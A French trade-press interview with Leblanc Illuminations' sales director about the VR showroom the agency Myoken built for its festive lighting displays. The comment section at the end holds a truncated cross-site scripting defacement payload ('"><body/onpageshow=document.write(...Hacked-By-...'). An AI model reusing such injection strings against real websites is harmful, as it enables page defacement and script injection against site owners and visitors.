MYOKEN, pour présenter des produits en réalité augmentée

Delphine Lalande - mercredi 20 décembre 2017 - 11:16

MYOKEN, pour présenter des produits en réalité augmentée

Avec un résultat proche du rendu final, la réalité augmentée et la réalité virtuelle sont de fortes valeurs ajoutées dans la démonstration de produits. L’entreprise Leblanc illuminations en a fait l’expérience réussie. L'agence Myoken a conçu pour eux un showroom virtuel, un outil intéressant pour les salons et les commerciaux.
Eric FRELY, Directeur commercial France de Leblanc illuminations, fait toute la lumière sur la façon dont la réalité virtuelle a modernisé l’image de l’entreprise. “Plonger les clients dans l’univers des décors 3D est un vrai plus pour nous. Nos clients voient en nous une image plus moderne qu’avant et ça c’est très positif”.


Comment ça marche – Pourquoi avoir fait appel à Myoken ?
Eric Frely - En 2015, Arnaud Leschemelle, qui a pris la présidence de Leblanc Illuminations, a entrepris une mutation de l’entreprise en créant « le concept Leblanc 4.0 ». Née en 1958, grâce à la volonté de Michel Leblanc créateur du marché des illuminations en Europe, l’entreprise a toujours su préserver son âme de pionnier et cette envie d’innover dans les illuminations festives. Moderniser l’activité et faire découvrir nos illuminations sous l’angle de la réalité virtuelle s’est présenté de manière naturelle, dans l’ère du temps et en phase avec la volonté d’Arnaud Leschemelle. Nous avions dans nos contacts la société Myoken vers qui nous nous sommes rapprochés pour découvrir leur savoir-faire et voir comment l’adapter à notre activité.

CCM – Qu’est-ce qui vous a convaincu d’essayer la réalité augmentée pour le showroom virtuel ?
EF - Tout simplement après avoir essayé et mis le casque de réalité virtuelle sur la tête ! Myoken nous avait prêté un casque de RV que nous avons pu essayer en interne. La magie a été immédiate ! Etre le premier fabricant d’illuminations au monde à faire découvrir cette nouveauté à nos clients est devenu une évidence.

CCM – Comment avez-vous procédé ?
EF - De nombreux échanges ont eu lieu avec Myoken sur notre projet. Nous avons modélisé et fourni des décors à Myoken qui a ainsi pu mettre en scène virtuellement une sélection de nos décors.

CCM – Pouvez-vous nous en dire plus sur le déroulement du showroom virtuel ?
EF - Nous proposons à nos clients de découvrir virtuellement 2 ambiances différentes au choix. Le spectateur est ainsi projeté dans un monde imaginaire et féérique et se balade tout en visualisant nos décors que ce soit à hauteur d’homme ou en s’envolant… l’effet est garanti !

CCM – Etes-vous satisfait du résultat ? Quelle est pour vous la valeur ajoutée de la réalité virtuelle ?
EF - Oui complètement ! L’utilisation de la réalité virtuelle dans notre domaine d’activité démontre une fois encore la volonté de Leblanc a toujours vouloir innover et faire vivre une nouvelle expérience à ses clients.
Plonger les clients dans l’univers des décors 3D est un vrai plus pour nous, l’ambiance, les couleurs sont proches du rendu final. Les clients vivent dans nos produits.

CCM – Quels ont été les retours des clients ?
EF - Le retour est hyper positif, les clients sont émerveillés, de découvrir nos illuminations d’une telle façon.
On ne peut pas noter une réelle augmentation de CA, mais nos clients voient en nous une image plus moderne qu’avant et ça c’est très positif.

CCM – Quelles sont les limites de cette solution en termes de marketing ? Doit-elle être complétée par autre chose ?
EF - Pour le moment, la réalité virtuelle s’arrête aux portes de l’esthétique si on peut dire. Les projets de nos clients nécessitent, bien entendu, d’être étudiés d’un point de vue technique et budgétaire. La RV vient en complément de notre catalogue papier et des photos et vidéos de nos réalisations présentant nos décors. Elle amène une vue à 360 degrés dont l’immersion offre une valeur ajoutée et sensibilise le client d’une manière nouvelle.
Néanmoins nous en sommes aux débuts de la RV dans notre secteur d’activité. Des pistes sont en cours de réflexion. L’idéal serait d’avoir l’ensemble de notre catalogue en RV est de pouvoir plonger le client vers l’univers et décors qu’il souhaite.

CCM – Combien cela vous a-t-il coûté ?
EF - Le montant restera……virtuel :)

CCM – A quel type d’entreprise recommanderiez-vous Myoken ?
EF - L’application de la RV est je pense assez vaste et peut s’appliquer à toute entreprise qui souhaite faire découvrir ses produits, ses services, son savoir-faire ou encore pour dévoiler le rendu d’un projet dans lequel on peut s’immerger. Elle est même utilisée dans des secteurs d’activité différents y compris dans le milieu médical.

Repères

MYOKEN

  • Entreprise dédiée à la conception d'expériences interactives et immersives pour le marketing événementiel des marques fondée en 2006 par Marie Alligier et Mickaël Marseul
  • L'agence s'articule autour de trois pôles de compétences : conseil (Myoken Consulting), créativité (Myoken Experience), et technologie (Myoken Lab).
  • Myoken
  • Lire aussi 5 agences de réalité augmentée

Leblanc Illuminations

  • Entreprise spécialisée dans la conception et la fabrication de décors lumineux 2D et 3D depuis 60 ans.
  • La société Leblanc est détenue par le Groupe SEDIA Développement.
  • 241 salariés (Leblanc, Freevox, filiales).
  • 5 filiales à l’étranger (Angleterre, Canada, Mexique, Roumanie, Russie).
  • Leblanc Illuminations

Ajouter un commentaire

Commentaires

Commenter la réponse de '"><body/onpageshow=document.write(/Hacked-By-RenwaX2